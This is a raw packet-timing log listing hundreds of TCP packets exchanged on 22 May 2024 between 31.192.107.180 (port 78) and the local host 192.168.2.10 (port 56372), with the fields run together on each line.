                                                      May 22, 2024 20:08:55.414520025 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.414531946 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.414537907 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.414542913 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.414550066 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.414555073 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.414592028 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.414622068 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.415033102 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415040016 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415065050 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415072918 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415083885 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415091038 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415091038 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.415096045 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.415124893 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.415158987 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.415998936 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416007042 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416019917 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416026115 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416032076 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416038036 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416064978 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.416098118 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.416764975 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416773081 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416784048 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416795969 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416800976 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416806936 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416811943 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416819096 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.416851044 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.416903019 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.417628050 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.417639971 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.417646885 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.417653084 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.417664051 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.417670012 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.417695999 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.417727947 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.418498993 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418507099 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418512106 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418518066 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418524981 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418530941 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418536901 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.418575048 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.418603897 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.419656038 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419666052 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419677019 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419683933 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419688940 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419694901 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419715881 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419722080 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.419733047 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.419799089 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.419800043 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.420382977 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420397997 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420404911 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420445919 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.420480013 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.420911074 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420917988 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420929909 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420937061 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.420990944 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.421571970 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.421580076 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.421591043 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.421596050 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.421643019 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.421673059 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.453859091 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.454108000 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.458501101 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.496896982 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.496912956 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.496984005 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.497066975 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497076035 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497087955 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497298956 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.497385025 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497458935 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.497493982 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497507095 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497555971 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.497714996 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497723103 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497735023 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.497775078 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.498168945 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498240948 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498301029 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.498477936 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498502016 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498507023 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498512983 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498517990 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498523951 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498533010 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.498550892 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.498583078 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.498614073 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.499396086 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499403954 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499414921 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499420881 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499430895 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499438047 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499443054 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.499464035 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.499494076 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.500299931 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.500308037 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.500319958 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.500325918 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.500379086 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.501092911 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501101017 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501111984 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501156092 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.501245975 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501254082 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501261950 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501267910 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501274109 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501280069 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501292944 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.501302004 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.501332998 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.502227068 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502233982 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502244949 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502252102 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502257109 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502264023 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502278090 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.502299070 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.502327919 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.503087044 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503094912 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503108025 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503113985 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503119946 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503125906 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503137112 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.503149986 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.503177881 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.503999949 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504005909 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504017115 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504021883 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504026890 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504031897 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504067898 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.504096985 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.504955053 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504961014 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504966021 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504971981 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504977942 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504983902 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.504990101 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505072117 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.505852938 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505871058 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505889893 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505896091 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505906105 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505913019 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505918980 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.505939007 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.505968094 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.506812096 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506819010 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506829977 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506834984 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506840944 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506851912 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506858110 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.506872892 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.506903887 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.506934881 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.507710934 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507724047 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507726908 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507730007 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507741928 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507747889 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507757902 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507764101 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.507802963 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.507833004 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.508601904 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508609056 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508620977 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508626938 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508631945 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508639097 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508654118 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.508670092 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.508698940 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.509536028 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.509542942 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.509553909 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.509573936 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.509578943 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.509584904 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.509613991 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.509648085 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.510438919 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510446072 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510457039 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510463953 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510469913 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510489941 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510493994 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510497093 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.510509014 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.510540962 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.510570049 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.511276007 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.511342049 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.537441969 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.546339035 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.551106930 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.551168919 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.587527037 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.587554932 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.587634087 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.587675095 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.587836027 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.587884903 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.587893963 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.587908983 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.587949991 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.588238955 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588247061 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588308096 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.588382006 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588390112 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588452101 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.588582039 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588589907 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588602066 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588608027 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.588651896 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.589010000 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589018106 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589030027 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589040995 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589081049 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.589112997 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.589488983 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589495897 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589503050 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589515924 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589523077 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589535952 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589540958 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.589557886 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.589587927 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.590240002 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590301037 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.590466022 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590477943 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590491056 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590497017 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590502977 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590508938 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590521097 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.590528011 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.590558052 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.590648890 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.591382027 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591389894 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591401100 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591408014 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591413975 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591419935 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591424942 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.591454983 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.591483116 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.592225075 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592236996 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592248917 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592255116 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592262030 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592284918 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.592338085 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.592912912 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592920065 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592930079 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592941999 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592947006 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592952967 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592959881 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.592988014 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.593019009 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.593776941 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593785048 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593796968 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593802929 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593807936 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593815088 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593820095 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.593847990 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.593878031 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.594728947 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594741106 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594753981 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594759941 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594772100 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594779015 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594784975 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.594830990 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.594861031 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.595371962 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595381975 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595393896 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595400095 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595410109 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595417023 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595422983 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595428944 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595434904 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595438957 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.595441103 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.595468044 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.595499992 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.595499992 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.596249104 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596256971 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596268892 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596275091 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596280098 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596296072 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596307039 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596311092 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.596313953 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596319914 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.596342087 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.596389055 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:08:55.597140074 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:08:55.597147942 CEST785637231.192.107.180192.168.2.10
